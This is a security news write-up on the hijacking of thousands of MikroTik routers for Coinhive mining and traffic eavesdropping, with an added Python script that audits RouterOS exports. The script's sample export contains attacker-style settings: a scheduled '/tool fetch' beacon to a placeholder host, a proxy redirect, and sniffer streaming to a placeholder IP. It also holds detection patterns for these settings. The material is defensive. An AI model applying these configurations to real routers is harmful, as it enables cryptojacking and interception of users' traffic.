What Happened

On September 4th, Chinese security researchers at 360 Netlab revealed that over 7,500 MikroTik routers had been hacked.

What it Means

The hack works by maliciously enabling the MikroTik RouterOS HTTP proxy feature. An HTTP proxy relays web requests from a network device to web resources on the clients' behalf. Think of it like this: your computer makes a connection request to an intermediary device, the intermediary fetches the web page from the real resource on your behalf and passes it back to you, so to the web server the request appears to come from the HTTP proxy. Once the proxy is enabled, the attacker redirects all proxied HTTP traffic to a local HTTP 403 error page (instead of the external web resource) that has been seeded with a link to web-mining code from coinhive.com. In other words, every web request users make through the MikroTik router's proxy is answered with the infected page hosted on the MikroTik router itself.

MikroTik RouterOS devices can also be configured to copy and forward all network traffic to a server of an attacker's choosing, thereby allowing the attacker to eavesdrop on user data.

Persistent Threat

Even if the IP address of an infected MikroTik router changes, the device is configured to run a scheduled task that periodically reaches out to a malicious URL, revealing its new IP address to the attacker.
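The three configuration changes described above (proxy enabled with a redirecting access rule, a scheduled beacon, and traffic mirroring) all show up in a RouterOS configuration export. The following audit script is an added example, not part of the original article or of any MikroTik tooling: it parses a constructed sample export and flags those settings. The RouterOS section and property names are the standard ones (`/ip proxy`, `/ip proxy access`, `/system scheduler`, `/tool sniffer`, `/tool fetch`); the hostname and IP addresses in the sample are placeholders, not real indicators.

```python
# Constructed sample of a RouterOS "/export" dump modelled on the footprint
# described in the article. Hosts and IPs are placeholders, not indicators.
SAMPLE_EXPORT = """\
/ip proxy
set enabled=yes port=8080
/ip proxy access
add action=deny redirect-to=192.0.2.10:8080
/system scheduler
add interval=1h name=upd on-event="/tool fetch url=http://beacon.example.invalid/ip"
/tool sniffer
set streaming-enabled=yes streaming-server=203.0.113.5
"""


def parse_sections(export_text):
    """Return {section path: [command lines]} from a RouterOS export.

    Section headers start with '/', commands ('set', 'add', ...) belong to
    the most recent header. Blank lines and '#' comments are skipped.
    """
    sections, current = {}, None
    for line in export_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            current = line
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def audit(export_text):
    """Flag settings matching the campaign's footprint; returns a list of findings."""
    s = parse_sections(export_text)
    findings = []
    if any("enabled=yes" in l for l in s.get("/ip proxy", [])):
        findings.append("web proxy enabled")
    for l in s.get("/ip proxy access", []):
        # Denied requests being redirected is how the 403 page gets substituted.
        if "action=deny" in l and "redirect-to=" in l:
            findings.append("proxy access rule redirects denied requests")
    for l in s.get("/system scheduler", []):
        # A periodic fetch of an external URL is the beacon that leaks the new IP.
        if "/tool fetch" in l and "http" in l:
            findings.append("scheduler runs /tool fetch to an external URL")
    for l in s.get("/tool sniffer", []):
        if "streaming-enabled=yes" in l:
            findings.append("packet sniffer streams traffic to a remote server")
    return findings
```

Run `audit()` over the output of `/export` from each router under your control; an empty list means none of the three settings is present, not that the device is clean.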

Why it Matters

According to MikroTik, "MikroTik is a Latvian company which was founded in 1996 to develop routers and wireless ISP systems. MikroTik now provides hardware and software for Internet connectivity in most of the countries around the world."

If your data traverses one of these infected MikroTik routers, there is a good chance it is being forwarded to a malicious entity. Since most Internet users control little of what sits between them and the web resources they are trying to access, they necessarily extend a level of trust to the networks that carry their data. With this in mind, the entities entrusted with user data must be vigilant in testing the software and hardware of their products so that situations like this can be mitigated.